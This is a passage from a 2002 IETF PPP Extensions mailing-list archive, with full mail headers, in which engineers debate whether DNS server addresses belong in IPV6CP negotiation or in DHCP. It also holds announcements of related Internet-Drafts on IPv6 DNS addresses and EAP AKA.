
> Because I commented on the SIP server address draft, someone pointed
> out this draft to me as well.  I somehow overlooked it the first time
> around.  Sorry for the extreme time delay.
>
> >  A major portion of the text in this memo was stolen from RFC 1877
> >  [8].
>
> Indeed.  And the proposal is flawed for exactly the same reasons that
> RFC 1877 is flawed.  These include:
>
> 	- There's no reason to expect that the "server" end of the
>           connection can supply or that the "client" end can use these
>           addresses.  It works only when the server has special
>           configuration, and the client *happens* to also be running a
>           local set of applications that care about DNS server
>           addresses.  It fails utterly if either peer happens to be a
>           mere router or bridge.

Yes, but only if we ignore the existence of AAA.

>
> 	- Using draft-ietf-dhc-dhcpv6-opt-dnsconfig-02.txt with
>           DHCPINFORM gives simple support for this feature on PPP, as
>           well as over any other medium that can carry UDP/IPv6.
>           Having one mechanism rather than N (where N>1) is better.

Very true, however DHCP is unlikely to work in an Internet roaming scenario.

>
> 	- The negotiation is backwards; the Configure-Request sender
>           is somehow obliged to "guess" at the addresses of the DNS
>           servers that actually reside on the other end of the link.

There needn't be any guessing involved: DNS clients are generally either
configured with DNS server addresses or not; this option allows for both
possibilities.

>
> More fundamentally, DNS server addresses (and search paths, and boot
> image names, and log hosts, and print servers, and home page URLs, and
> so on) are application-level details.  PPP's NCPs are a mechanism for
> negotiating link layer issues, such as proper numbering, naming, and
> identification.  DNS resolver configuration is not a per-link issue.

This is not necessarily true.  For example, say that a user is dialing into
a POP operated by an ISP who has contracted with the user's employer to
provide connectivity to the corporate "intranet".  For this hypothetical
user, the ISP's DNS servers are pretty much useless (because the user needs
internal corporate addresses), as is DHCP, since the addresses of the
appropriate DNS servers are returned by the corporate AAA server.

>
> --
> James Carlson, Solaris Networking         <james.d.carlson@east.sun.com>
> SUN Microsystems / 1 Network Drive         71.234W   Vox +1 781 442 2084
> MS UBUR02-212 / Burlington MA 01803-2757   42.497N   Fax +1 781 442 1677
>




From owner-ietf-ppp@merit.edu  Mon Jun 10 08:52:22 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA01785
	for <pppext-archive@odin.ietf.org>; Mon, 10 Jun 2002 08:52:22 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id 7E83691240; Mon, 10 Jun 2002 08:52:36 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id 480CE91241; Mon, 10 Jun 2002 08:52:36 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id 4844991240
	for <ietf-ppp@trapdoor.merit.edu>; Mon, 10 Jun 2002 08:52:35 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id 2F3705DDFE; Mon, 10 Jun 2002 08:52:31 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from nwkea-mail-1.sun.com (nwkea-mail-1.sun.com [192.18.42.13])
	by segue.merit.edu (Postfix) with ESMTP id D78265DDA7
	for <ietf-ppp@merit.edu>; Mon, 10 Jun 2002 08:52:30 -0400 (EDT)
Received: from eastmail2.East.Sun.COM ([129.148.1.241])
	by nwkea-mail-1.sun.com (8.9.3+Sun/8.9.3) with ESMTP id FAA25379;
	Mon, 10 Jun 2002 05:52:38 -0700 (PDT)
Received: from phorcys.east.sun.com (phorcys.East.Sun.COM [129.148.174.143])
	by eastmail2.East.Sun.COM (8.9.3+Sun/8.9.3/ENSMAIL,v2.1p1) with ESMTP id IAA01564;
	Mon, 10 Jun 2002 08:52:38 -0400 (EDT)
Received: from phorcys.east.sun.com (localhost [127.0.0.1])
	by phorcys.east.sun.com (8.12.3+Sun/8.12.3) with ESMTP id g5ACqY6V166231;
	Mon, 10 Jun 2002 08:52:34 -0400 (EDT)
Received: (from carlsonj@localhost)
	by phorcys.east.sun.com (8.12.3+Sun/8.12.3/Submit) id g5ACqXJe166228;
	Mon, 10 Jun 2002 08:52:33 -0400 (EDT)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15620.41233.358327.934221@gargle.gargle.HOWL>
Date: Mon, 10 Jun 2002 08:52:33 -0400
From: James Carlson <james.d.carlson@east.sun.com>
To: <gwz@cisco.com>
Cc: "pppext" <ietf-ppp@merit.edu>, <tom.hiller@lucent.com>
Subject: RE: I-D ACTION:draft-hiller-dns-addr-00.txt
In-Reply-To: Glen Zorn's message of 10 June 2002 04:56:48
References: <15614.13610.120869.311924@gargle.gargle.HOWL>
	<LMEEIEAEKIEGIECKAPBHEEICCJAA.gwz@cisco.com>
X-Mailer: VM 7.01 under Emacs 21.2.1
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu
Content-Transfer-Encoding: 7bit

Glen Zorn writes:
> James Carlson [mailto:james.d.carlson@east.sun.com] writes:
[...]
> > 	- There's no reason to expect that the "server" end of the
> >           connection can supply or that the "client" end can use these
> >           addresses.  It works only when the server has special
> >           configuration, and the client *happens* to also be running a
> >           local set of applications that care about DNS server
> >           addresses.  It fails utterly if either peer happens to be a
> >           mere router or bridge.
> 
> Yes, but only if we ignore the existence of AAA.

That's a local implementation matter.  *If* your AAA implementation
dictates DNS server addresses (arguably a very bad choice, for very
many reasons), *then* you have to find a reasonable way to put these
bits on the wire.  This is no different from handling any other non-L2
information that comes from the AAA server -- including lists of IP
filters to put in place.

Note that 802.1x can also use AAA on the server and thus has the same
(non-)problem.  How are DNS server addresses transferred in this case?
Why should we prefer a PPP-only solution to a general problem?

(The reasons that putting DNS server addresses into AAA is bad include
the fact that it's both technically infeasible to force the client to
use a particular DNS server, and probably unwise as well.  At best,
the data here are merely advice to the client -- not required.)

Note also that a reasonable PPP server can if necessary insert an NAI
based on local configuration ... being a DHCP proxy provides a great
deal of flexibility.

> > 	- Using draft-ietf-dhc-dhcpv6-opt-dnsconfig-02.txt with
> >           DHCPINFORM gives simple support for this feature on PPP, as
> >           well as over any other medium that can carry UDP/IPv6.
> >           Having one mechanism rather than N (where N>1) is better.
> 
> Very true, however DHCP is unlikely to work in an Internet roaming scenario.

Please explain that comment.  There's nothing in the on-the-wire bits
that makes this proposal any better or worse than DHCP with respect to
roaming.

In fact, there's nothing particular in PPP or DHCP that helps or hurts
roaming.

Are you, perhaps, suggesting that a DHCP server doesn't know which
port or authenticated peer is in use?  If that's the case, then, like
this proposal, this is a matter of local policy and implementation.
This same issue exists with any other use of DHCP.  Why should DNS
server addresses be special?  If we need this proposal, why not just
copy *all* DHCP options into IPCP and IPV6CP?

Are you suggesting that the DHCP client doesn't know when to ask for
new data?  It's supposed to do it when the link goes up, and if it
doesn't, then the implementation is broken, not the protocol.

> > 	- The negotiation is backwards; the Configure-Request sender
> >           is somehow obliged to "guess" at the addresses of the DNS
> >           servers that actually reside on the other end of the link.
> 
> There needn't be any guessing involved: DNS clients are generally either
> configured with DNS server addresses or not; this option allows for both
> possibilities.

No.  Here's the protocol as it exists in this draft (and RFC 1877):

  Client: "I think there might be DNS servers on your end of the link
  that have IP addresses 10.0.0.1 and 10.0.0.2.  Is that correct?"

  Server: "No, I (somehow) see some DNS servers here, but the right
  addresses are 10.0.0.3 and 10.0.0.4."

  Client: "I think there might be DNS servers on your end of the link
  that have IP addresses 10.0.0.3 and 10.0.0.4.  Is that correct?"

  Server: "Yes, that's right."

A much more reasonable protocol would be to have the side that has the
data *send* that data to the other side.  In other words:

  Server: "Guess what?  I have a couple of DNS servers here at
  10.0.0.3 and 10.0.0.4.  I don't know if you care, but here they
  are."

  Client: "Super."

What I think is going on here is a basic misunderstanding of how PPP
negotiation works, based on a faulty observation of how IPCP IP-
Address negotiation is sometimes *used*.  With IP-Address, it's common
for one side to be ignorant of its own IP address.  Thus, it has to
ask the other side (via Configure-Request for 0.0.0.0) to find out
what the other side thinks its address might be.  This, however, isn't
the case for which the option was designed.  By design, the IP-Address
option sends the local system's IP address via Configure-Request to
the peer.  Each system sends its own IP address because it "owns" that
information.  The use of Configure-Nak exists only in the case where
the other peer disagrees.

This DNS proposal is *not* the same case.  Instead, this draft (and
RFC 1877) intentionally have the side that does *not* own the data
(and merely holds a copy of that data) sending the Configure-Request.
That's backwards.

We shouldn't be confused about which side of the link "owns" the data.
The name servers are present on the *server's* side of the link.  The
numbering of those servers exists on that side of the link.  The side
that owns the data should be sending the Configure-Request.

If you don't want to change it because RFC 1877 is already broken,
then that's fine, but that doesn't make it any less backwards.

> > More fundamentally, DNS server addresses (and search paths, and boot
> > image names, and log hosts, and print servers, and home page URLs, and
> > so on) are application-level details.  PPP's NCPs are a mechanism for
> > negotiating link layer issues, such as proper numbering, naming, and
> > identification.  DNS resolver configuration is not a per-link issue.
> 
> This is not necessarily true.  For example, say that a user is dialing into
> a POP operated by an ISP who has contracted with the user's employer to
> provide connectivity to the corporate "intranet".  For this hypothetical
> user, the ISP's DNS servers are pretty much useless (because the user needs
> internal corporate addresses), as is DHCP, since the addresses of the
> appropriate DNS servers are returned by the corporate AAA server.

Actually, if this is the case, then the entire link is useless with
respect to the ISP.  It ought to have addresses that are assigned from
within the corporate entities' private address space.  Since such a
link goes behind a corporate firewall, it also means that much of the
ISP is inaccessible to the client side over that link.  That's by
design.

Ignoring whether this is a good idea (ssh and IPsec are obviously
*much* better solutions that don't expose the corporate entity in
question to a potentially highly foolish entanglement with the ISP's
internal security), this issue is really a red herring.

Since the link is tunneled back to the corporate site, this means that
*all* packets sent by the remote client must be tunneled back.  This
includes the DHCPINFORM messages themselves.  The corporate site's
server(s) that terminate the tunnel can then respond with the
appropriate information.

Since the ISP's server is aware of this chicanery (it must, since the
IP addresses on the link are unrelated to its own IP address space,
and may overlap other corporate customer's addresses or even its own
internal addresses, and since it acts as one end of the tunnel), the
ISP's server can know whether to provide helpful DHCP information
locally or forward along the tunnel.

Like RFC 1877, this draft should *at best* be on Informational track,
despite what the Category header in the draft suggests.  However, I
would strongly prefer that it not be published as an RFC at all.  It's
not necessary and merely perpetuates a previous design error into a
brand new realm.

-- 
James Carlson, Solaris Networking         <james.d.carlson@east.sun.com>
SUN Microsystems / 1 Network Drive         71.234W   Vox +1 781 442 2084
MS UBUR02-212 / Burlington MA 01803-2757   42.497N   Fax +1 781 442 1677


From owner-ietf-ppp@merit.edu  Mon Jun 10 09:52:52 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA04343
	for <pppext-archive@odin.ietf.org>; Mon, 10 Jun 2002 09:52:51 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id 782EF91246; Mon, 10 Jun 2002 09:52:13 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id 4BE6C9124E; Mon, 10 Jun 2002 09:52:13 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id 6215391246
	for <ietf-ppp@trapdoor.merit.edu>; Mon, 10 Jun 2002 09:52:09 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id DCDB15DDFE; Mon, 10 Jun 2002 09:52:05 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from internaut.com (unknown [64.38.134.99])
	by segue.merit.edu (Postfix) with ESMTP id 687F05DD97
	for <ietf-ppp@merit.edu>; Mon, 10 Jun 2002 09:52:05 -0400 (EDT)
Received: from localhost (aboba@localhost)
	by internaut.com (8.10.2/8.10.2) with ESMTP id g5AD2iH13507;
	Mon, 10 Jun 2002 06:02:44 -0700
Date: Mon, 10 Jun 2002 06:02:44 -0700 (PDT)
From: Bernard Aboba <aboba@internaut.com>
To: Glen Zorn <gwz@cisco.com>
Cc: James Carlson <james.d.carlson@east.sun.com>, pppext <ietf-ppp@merit.edu>,
        <tom.hiller@lucent.com>
Subject: RE: I-D ACTION:draft-hiller-dns-addr-00.txt
In-Reply-To: <LMEEIEAEKIEGIECKAPBHEEICCJAA.gwz@cisco.com>
Message-ID: <Pine.LNX.4.44.0206100554580.12916-100000@internaut.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu

> Yes, but only if we ignore the existence of AAA.

Routability is an issue. If a AAA server returns an address for a node,
then the NAS (or the VPN server, if compulsory tunneling is involved)
has to advertise a prefix that encompasses that address.

> Very true, however DHCP is unlikely to work in an Internet roaming scenario.

What breaks?

> This is not necessarily true.  For example, say that a user is dialing into
> a POP operated by an ISP who has contracted with the user's employer to
> provide connectivity to the corporate "intranet".  For this hypothetical
> user, the ISP's DNS servers are pretty much useless (because the user needs
> internal corporate addresses), as is DHCP, since the addresses of the
> appropriate DNS servers are returned by the corporate AAA server.

If the user needs internal corporate addresses, then we're talking about
compulsory tunneling. Without tunneling, the NAS can't just assign such an
address, since routability is an issue. If a AAA server returns an
address for a node, then the NAS (or the VPN server, if compulsory
tunneling is involved) has to advertise a prefix that encompasses that address.

If we have a compulsory tunnel, then a DHCPINFORM sent to the NAS will be
sent down the tunnel for handling by the corporate DHCP server. So the
user will get what is required, namely the internal DNS server address.





From owner-ietf-ppp@merit.edu  Mon Jun 10 09:55:42 2002
Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id JAA04422
	for <pppext-archive@odin.ietf.org>; Mon, 10 Jun 2002 09:55:42 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id 2469591247; Mon, 10 Jun 2002 09:55:34 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id E224991248; Mon, 10 Jun 2002 09:55:33 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id D827691247
	for <ietf-ppp@trapdoor.merit.edu>; Mon, 10 Jun 2002 09:55:32 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id BCE195DEA4; Mon, 10 Jun 2002 09:55:28 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from internaut.com (unknown [64.38.134.99])
	by segue.merit.edu (Postfix) with ESMTP id 508A85DD97
	for <ietf-ppp@merit.edu>; Mon, 10 Jun 2002 09:55:28 -0400 (EDT)
Received: from localhost (aboba@localhost)
	by internaut.com (8.10.2/8.10.2) with ESMTP id g5AD65T13687;
	Mon, 10 Jun 2002 06:06:05 -0700
Date: Mon, 10 Jun 2002 06:06:05 -0700 (PDT)
From: Bernard Aboba <aboba@internaut.com>
To: James Carlson <james.d.carlson@east.sun.com>
Cc: gwz@cisco.com, pppext <ietf-ppp@merit.edu>, <tom.hiller@lucent.com>
Subject: RE: I-D ACTION:draft-hiller-dns-addr-00.txt
In-Reply-To: <15620.41233.358327.934221@gargle.gargle.HOWL>
Message-ID: <Pine.LNX.4.44.0206100603000.12916-100000@internaut.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu

> Note that 802.1x can also use AAA on the server and thus has the same
> (non-)problem.  How are DNS server addresses transferred in this case?

Answer: DHCP is used. If required, the 802.1X authenticator can
function as a DHCP Relay or Server.

> Note also that a reasonable PPP server can if necessary insert an NAI
> based on local configuration ... being a DHCP proxy provides a great
> deal of flexibility.

Careful. DHCP proxies are not defined in the DHC RFCs, only relays.

> Are you, perhaps, suggesting that a DHCP server doesn't know which
> port or authenticated peer is in use?

In fact, this is handled via the DHCP Relay Option.




From owner-ietf-ppp@merit.edu  Mon Jun 10 10:11:13 2002
Received: from trapdoor.merit.edu (trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id KAA05035
	for <pppext-archive@odin.ietf.org>; Mon, 10 Jun 2002 10:11:13 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id 3F1F09124A; Mon, 10 Jun 2002 10:08:39 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id 2AC1D9124C; Mon, 10 Jun 2002 10:08:36 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id 154259124B
	for <ietf-ppp@trapdoor.merit.edu>; Mon, 10 Jun 2002 10:08:34 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id E79DA5DDFC; Mon, 10 Jun 2002 10:08:29 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from kathmandu.sun.com (kathmandu.sun.com [192.18.98.36])
	by segue.merit.edu (Postfix) with ESMTP id B6BBF5DD97
	for <ietf-ppp@merit.edu>; Mon, 10 Jun 2002 10:08:29 -0400 (EDT)
Received: from eastmail2.East.Sun.COM ([129.148.1.241])
	by kathmandu.sun.com (8.9.3+Sun/8.9.3) with ESMTP id IAA06485;
	Mon, 10 Jun 2002 08:08:30 -0600 (MDT)
Received: from phorcys.east.sun.com (phorcys.East.Sun.COM [129.148.174.143])
	by eastmail2.East.Sun.COM (8.9.3+Sun/8.9.3/ENSMAIL,v2.1p1) with ESMTP id KAA21304;
	Mon, 10 Jun 2002 10:08:28 -0400 (EDT)
Received: from phorcys.east.sun.com (localhost [127.0.0.1])
	by phorcys.east.sun.com (8.12.3+Sun/8.12.3) with ESMTP id g5AE8O6V166382;
	Mon, 10 Jun 2002 10:08:24 -0400 (EDT)
Received: (from carlsonj@localhost)
	by phorcys.east.sun.com (8.12.3+Sun/8.12.3/Submit) id g5AE8OAc166379;
	Mon, 10 Jun 2002 10:08:24 -0400 (EDT)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15620.45783.868740.933498@gargle.gargle.HOWL>
Date: Mon, 10 Jun 2002 10:08:23 -0400
From: James Carlson <james.d.carlson@east.sun.com>
To: Bernard Aboba <aboba@internaut.com>
Cc: Glen Zorn <gwz@cisco.com>, pppext <ietf-ppp@merit.edu>,
        <tom.hiller@lucent.com>
Subject: RE: I-D ACTION:draft-hiller-dns-addr-00.txt
In-Reply-To: Bernard Aboba's message of 10 June 2002 06:02:44
References: <15620.41233.358327.934221@gargle.gargle.HOWL>
	<Pine.LNX.4.44.0206100603000.12916-100000@internaut.com>
	<LMEEIEAEKIEGIECKAPBHEEICCJAA.gwz@cisco.com>
	<Pine.LNX.4.44.0206100554580.12916-100000@internaut.com>
X-Mailer: VM 7.01 under Emacs 21.2.1
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu
Content-Transfer-Encoding: 7bit

Bernard Aboba writes:
> > Yes, but only if we ignore the existence of AAA.
> 
> Routability is an issue. If a AAA server returns an address for a node,
> then the NAS (or the VPN server, if compulsory tunneling is involved)
> has to advertise a prefix that encompasses that address.

"Yuck."  How does anyone know what might be reachable by an arbitrary
third party?

Bernard Aboba writes:
> > Note that 802.1x can also use AAA on the server and thus has the same
> > (non-)problem.  How are DNS server addresses transferred in this case?
> 
> Answer: DHCP is used. If required, the 802.1X authenticator can
> function as a DHCP Relay or Server.

That's exactly my point.  If you can do it for the 802.1x
authenticator, then you can do it for PPP.

> > Note also that a reasonable PPP server can if necessary insert an NAI
> > based on local configuration ... being a DHCP proxy provides a great
> > deal of flexibility.
> 
> Careful. DHCP proxies are not defined in the DHC RFCs, only relays.

True.  That doesn't stop anyone from implementing such a thing for any
reason.  I don't believe that any such RFC is required, since it would
involve *only* the internal behavior of a system, not the bits that
appear on the wire.  There's no good reason to write RFCs about things
that external systems can't observe.

For the same reason that BOOTP proxies for SLIP were common 10 years
ago, I expect DHCP proxies to be just as reasonable.  The issues are
essentially unchanged today.

> > Are you, perhaps, suggesting that a DHCP server doesn't know which
> > port or authenticated peer is in use?
> 
> In fact, this is handled via the DHCP Relay Option.

I'm trying to extract the reason why DHCP can't be used, and IPV6CP
must be modified instead.  Since no reason is given, I have to guess
at it.  I suspect that it's just parity with RFC 1877, and that would
not be a good thing.

-- 
James Carlson, Solaris Networking         <james.d.carlson@east.sun.com>
SUN Microsystems / 1 Network Drive         71.234W   Vox +1 781 442 2084
MS UBUR02-212 / Burlington MA 01803-2757   42.497N   Fax +1 781 442 1677


From owner-ietf-ppp@merit.edu  Tue Jun 25 07:16:54 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id HAA00320
	for <pppext-archive@odin.ietf.org>; Tue, 25 Jun 2002 07:16:54 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id C2C7A91250; Tue, 25 Jun 2002 07:04:44 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id 8A47591251; Tue, 25 Jun 2002 07:04:44 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id 7833591250
	for <ietf-ppp@trapdoor.merit.edu>; Tue, 25 Jun 2002 07:04:43 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id 633875DE53; Tue, 25 Jun 2002 07:04:43 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from ietf.org (odin.ietf.org [132.151.1.176])
	by segue.merit.edu (Postfix) with ESMTP id E3E1E5DE50
	for <ietf-ppp@merit.edu>; Tue, 25 Jun 2002 07:04:42 -0400 (EDT)
Received: from CNRI.Reston.VA.US (localhost [127.0.0.1])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id HAA29777;
	Tue, 25 Jun 2002 07:03:59 -0400 (EDT)
Message-Id: <200206251103.HAA29777@ietf.org>
Mime-Version: 1.0
Content-Type: Multipart/Mixed; Boundary="NextPart"
To: IETF-Announce: ;
Cc: ietf-ppp@merit.edu
From: Internet-Drafts@ietf.org
Reply-To: Internet-Drafts@ietf.org
Subject: I-D ACTION:draft-ietf-pppext-ipv6-dns-addr-00.txt
Date: Tue, 25 Jun 2002 07:03:59 -0400
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu

--NextPart

A New Internet-Draft is available from the on-line Internet-Drafts directories.
This draft is a work item of the Point-to-Point Protocol Extensions Working Group of the IETF.

	Title		: PPP IPV6 Control Protocol Extensions for DNS Server 
                          Addresses
	Author(s)	: T. Hiller, G. Zorn
	Filename	: draft-ietf-pppext-ipv6-dns-addr-00.txt
	Pages		: 7
	Date		: 24-Jun-02
	
The Point-to-Point Protocol (PPP) provides a standard method for
transporting multi-protocol datagrams over point-to-point links.  PPP
defines an extensible Link Control Protocol and a family of Network
Control Protocols (NCPs) for establishing and configuring different
network-layer protocols.
This document extends the NCP for establishing and configuring
Version 6 of the Internet Protocol (IPV6) over PPP, defining the
negotiation of primary and secondary Domain Name System (DNS) server
IPV6 addresses.

A URL for this Internet-Draft is:
http://www.ietf.org/internet-drafts/draft-ietf-pppext-ipv6-dns-addr-00.txt

To remove yourself from the IETF Announcement list, send a message to 
ietf-announce-request with the word unsubscribe in the body of the message.

Internet-Drafts are also available by anonymous FTP. Login with the username
"anonymous" and a password of your e-mail address. After logging in,
type "cd internet-drafts" and then
	"get draft-ietf-pppext-ipv6-dns-addr-00.txt".

A list of Internet-Drafts directories can be found in
http://www.ietf.org/shadow.html 
or ftp://ftp.ietf.org/ietf/1shadow-sites.txt


Internet-Drafts can also be obtained by e-mail.

Send a message to:
	mailserv@ietf.org.
In the body type:
	"FILE /internet-drafts/draft-ietf-pppext-ipv6-dns-addr-00.txt".
	
NOTE:	The mail server at ietf.org can return the document in
	MIME-encoded form by using the "mpack" utility.  To use this
	feature, insert the command "ENCODING mime" before the "FILE"
	command.  To decode the response(s), you will need "munpack" or
	a MIME-compliant mail reader.  Different MIME-compliant mail readers
	exhibit different behavior, especially when dealing with
	"multipart" MIME messages (i.e. documents which have been split
	up into multiple messages), so check your local documentation on
	how to manipulate these messages.
		
		
Below is the data which will enable a MIME compliant mail reader
implementation to automatically retrieve the ASCII version of the
Internet-Draft.

--NextPart
Content-Type: Multipart/Alternative; Boundary="OtherAccess"

--OtherAccess
Content-Type: Message/External-body;
	access-type="mail-server";
	server="mailserv@ietf.org"

Content-Type: text/plain
Content-ID:	<20020624144139.I-D@ietf.org>

ENCODING mime
FILE /internet-drafts/draft-ietf-pppext-ipv6-dns-addr-00.txt

--OtherAccess
Content-Type: Message/External-body;
	name="draft-ietf-pppext-ipv6-dns-addr-00.txt";
	site="ftp.ietf.org";
	access-type="anon-ftp";
	directory="internet-drafts"

Content-Type: text/plain
Content-ID:	<20020624144139.I-D@ietf.org>

--OtherAccess--

--NextPart--




From owner-ietf-ppp@merit.edu  Fri Jun 28 08:35:23 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA23205
	for <pppext-archive@odin.ietf.org>; Fri, 28 Jun 2002 08:35:23 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id B243891334; Fri, 28 Jun 2002 08:35:53 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id 7D50591335; Fri, 28 Jun 2002 08:35:53 -0400 (EDT)
Delivered-To: ietf-ppp@trapdoor.merit.edu
Received: from segue.merit.edu (segue.merit.edu [198.108.1.41])
	by trapdoor.merit.edu (Postfix) with ESMTP id 67AEA91334
	for <ietf-ppp@trapdoor.merit.edu>; Fri, 28 Jun 2002 08:35:52 -0400 (EDT)
Received: by segue.merit.edu (Postfix)
	id 42A095DED3; Fri, 28 Jun 2002 08:35:52 -0400 (EDT)
Delivered-To: ietf-ppp@merit.edu
Received: from mgw-x2.nokia.com (mgw-x2.nokia.com [131.228.20.22])
	by segue.merit.edu (Postfix) with ESMTP id 9B1E05DDBC
	for <ietf-ppp@merit.edu>; Fri, 28 Jun 2002 08:35:51 -0400 (EDT)
Received: from esvir03nok.nokia.com (esvir03nokt.ntc.nokia.com [172.21.143.35])
	by mgw-x2.nokia.com (Switch-2.2.1/Switch-2.2.0) with ESMTP id g5SCaIi28967
	for <ietf-ppp@merit.edu>; Fri, 28 Jun 2002 15:36:18 +0300 (EET DST)
Received: from esebh001.NOE.Nokia.com (unverified) by esvir03nok.nokia.com
 (Content Technologies SMTPRS 4.2.5) with ESMTP id <T5bc3c5e599ac158f23077@esvir03nok.nokia.com>;
 Fri, 28 Jun 2002 15:35:50 +0300
Received: from esebe004.NOE.Nokia.com ([172.21.138.44]) by esebh001.NOE.Nokia.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Fri, 28 Jun 2002 15:35:50 +0300
Received: from trebe003.NOE.Nokia.com ([172.22.232.175]) by esebe004.NOE.Nokia.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Fri, 28 Jun 2002 15:35:49 +0300
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: New EAP AKA draft
Date: Fri, 28 Jun 2002 15:35:49 +0300
Message-ID: <DED1F2C6CE07FA498D7AD0CCAC03401B015D0FC0@trebe003.NOE.Nokia.com>
Thread-Topic: EAP SIM version 4
Thread-Index: AcINP10iWF9AVySAQdOqkFudlVSLqQRYCyHg
From: <henry.haverinen@nokia.com>
To: <eap@frascone.com>
Cc: <ietf-ppp@merit.edu>, <jari.arkko@ericsson.fi>
X-OriginalArrivalTime: 28 Jun 2002 12:35:49.0795 (UTC) FILETIME=[55818F30:01C21EA0]
Sender: owner-ietf-ppp@merit.edu
Precedence: bulk
Errors-To: owner-ietf-ppp-outgoing@merit.edu
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by ietf.org id IAA23205


Hi there,

Jari and I have submitted a new version of the EAP AKA
draft to the I-D directories. It is also available at:

http://www.cs.tut.fi/~haverinh/draft-arkko-pppext-eap-aka-04.txt

The changes are visible in the following pdf file:
http://www.cs.tut.fi/~haverinh/eap-aka-04-changes.pdf

Changes to version 03:
- all comments since February 2002 addressed. Most significantly,
  there are 128-bit MAC codes and a new PRF based on NIST FIBS 186-2
- zero configuration
- independence of EAP-Response/Identity
- improved IANA considerations
- lot of editorial changes

Best regards,
Henry


From owner-ietf-ppp@merit.edu  Fri Jun 28 08:39:09 2002
Received: from trapdoor.merit.edu (postfix@trapdoor.merit.edu [198.108.1.26])
	by ietf.org (8.9.1a/8.9.1a) with ESMTP id IAA23383
	for <pppext-archive@odin.ietf.org>; Fri, 28 Jun 2002 08:39:08 -0400 (EDT)
Received: by trapdoor.merit.edu (Postfix)
	id 9C99D91335; Fri, 28 Jun 2002 08:39:38 -0400 (EDT)
Delivered-To: ietf-ppp-outgoing@trapdoor.merit.edu
Received: by trapdoor.merit.edu (Postfix, from userid 56)
	id 6598E91336; Fri, 28 Jun 2002 08:39:38 -0400 (EDT)
